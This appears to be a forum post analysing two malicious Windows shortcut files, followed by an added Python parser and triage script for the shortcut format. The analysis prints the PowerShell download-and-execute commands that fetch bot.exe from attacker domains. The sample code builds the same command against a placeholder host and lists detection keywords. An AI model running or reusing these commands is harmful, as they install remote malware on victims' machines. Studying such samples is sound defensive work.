Analysis for file 7f5a*.lnk
Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Sun, 25 Oct 2015 20:40:10 GMT
Last Modified Date: Sun, 25 Oct 2015 20:40:10 GMT
Comments:
The shortcut link tries to open PowerShell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and passes arguments to it to download a file, save it in the temp folder as a.exe, and then run the newly saved application. The file tries to download a file from the URL hxxp :// goodvin77787.in/bot . exe; taking the extension into consideration, it appears to be a PE file, but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:
(new-object System.Net.WebClient).DownloadFile('http://goodvin77787.in/bot.exe','%TEMP%\a.exe');Start-Process "%TEMP%\a.exe
Moreover, the process window show command value was found to be SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process a.exe is iconified and the icon is taken from SHELL32.DLL, the icon index being 54 and the dimensions being 24x24.
Analysis for file 55e8*.lnk
Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Thu, 29 Oct 2015 04:37:08 GMT
Last Modified Date: Thu, 29 Oct 2015 04:37:08 GMT
Comments:
The shortcut link tries to open PowerShell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and passes arguments to it to download a file, save it in the temp folder as z.exe, and then run the newly saved application. The file tries to download a file from the URL hxxp :// goodprice28.pw/bot . exe; taking the extension into consideration, it appears to be a PE file, but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:
(new-object System.Net.WebClient).DownloadFile('http://goodprice28.pw/bot.exe','%TEMP%\z.exe');Start-Process "%TEMP%\z.exe
Moreover, the process window show command value was found to be SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process z.exe is iconified and the icon is taken from SHELL32.DLL, the icon index being 70 and the dimensions being 24x24.
I am not writing any specific conclusion since I am not able to directly examine the bot.exe files and see their effect. I hope this much is fine. Let me know where I messed up. I would also like to know if anything specific can be deduced from the SID that is present in both files.
Edit: Made malicious links unclickable -Deque
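The fields the post pulls out of the two shortcuts by hand (the 20-byte magic, the FILETIME stamps, IconIndex, ShowCommand and the StringData section holding the PowerShell arguments) all sit at fixed offsets or in a fixed order laid down by MS-SHLLINK, so they can be recovered programmatically. The following is an added example, not code from the original post or any tool it mentions. It builds a constructed .lnk in memory that mirrors the first sample (powershell.exe target, SW_SHOWMINNOACTIVE, icon index 54, timestamp 2015-10-25 20:40:10 GMT) with a placeholder URL (example.invalid) in place of the live domain, parses it back, and flags the indicators a triage script would look for. The builder, the indicator list and the stub LinkTargetIDList are assumptions for illustration.

```python
"""Minimal Shell Link (.LNK) header and StringData parser per MS-SHLLINK.
Added example; the sample .lnk bytes are constructed in-memory, not a real file."""
import struct
from datetime import datetime, timedelta, timezone

HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046, as it appears on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1), low byte only
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# Only these three ShowCommand values are defined; anything else is treated as SW_SHOWNORMAL
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt):
    """FILETIME: 100-ns intervals since 1601-01-01 UTC."""
    return (dt - EPOCH_1601) // timedelta(microseconds=1) * 10


def from_filetime(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_lnk(data):
    hdr_size, clsid = struct.unpack_from("<I16s", data, 0)
    if hdr_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize/LinkCLSID")
    (flags, _attrs, ctime, _atime, wtime, _fsize, icon_idx, show_cmd,
     _hotkey, _r1, _r2, _r3) = struct.unpack_from("<IIQQQIiIHHII", data, 20)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize + IDList, skipped here
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    strings = {}
    # StringData entries appear in this fixed order, each as CountCharacters + chars
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + width * count]
            pos += width * count
            strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return {"magic": " ".join("%02X" % b for b in data[:20]),
            "creation_time": from_filetime(ctime), "write_time": from_filetime(wtime),
            "icon_index": icon_idx,
            "show_command": SHOW_COMMANDS.get(show_cmd, "SW_SHOWNORMAL"),
            **strings}


def indicators(info):
    """Assumed triage heuristics: a shortcut that launches PowerShell minimized
    with download-and-execute arguments is the pattern seen in the samples above."""
    hits = []
    target = (info.get("relative_path") or "").lower()
    args = (info.get("arguments") or "").lower()
    if target.endswith("powershell.exe"):
        hits.append("target is powershell.exe")
        if info["show_command"] == "SW_SHOWMINNOACTIVE":
            hits.append("launched minimized (SW_SHOWMINNOACTIVE)")
    for needle in ("downloadfile", "downloadstring", "start-process", "iex", "%temp%"):
        if needle in args:
            hits.append("arguments contain " + needle)
    return hits


def build_lnk(relative_path, arguments, icon_location, icon_index, show_cmd, when):
    """Constructs a minimal Unicode .lnk with a stub LinkTargetIDList (assumption)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    ft = to_filetime(when)
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         ft, ft, ft, 0, icon_index, show_cmd, 0, 0, 0, 0)
    # one 4-byte ItemID (size field + 2 data bytes) followed by the 2-byte TerminalID
    id_list = struct.pack("<H", 6) + struct.pack("<HH", 4, 0x1F) + b"\x00\x00"

    def sd(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + id_list + sd(relative_path) + sd(arguments) + sd(icon_location)


# Constructed sample mirroring the first shortcut; the URL is a placeholder, not the real domain.
SAMPLE_ARGS = ("(new-object System.Net.WebClient).DownloadFile("
               "'http://example.invalid/bot.exe','%TEMP%\\a.exe');Start-Process \"%TEMP%\\a.exe\"")
SAMPLE_LNK = build_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    arguments=SAMPLE_ARGS, icon_location="%SystemRoot%\\System32\\SHELL32.dll",
    icon_index=54, show_cmd=7, when=datetime(2015, 10, 25, 20, 40, 10, tzinfo=timezone.utc))

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    for k, v in info.items():
        print("%-14s %s" % (k, v))
    print("indicators:", indicators(info))
```

Run against a real file with `parse_lnk(open(path, "rb").read())`. Note that the parser skips the LinkTargetIDList and LinkInfo blocks rather than decoding them, so the absolute target path (which lives in those structures, not in StringData) is not recovered here; for that, and for the tracker block holding the machine identifier the post asks about, a full MS-SHLLINK implementation is needed.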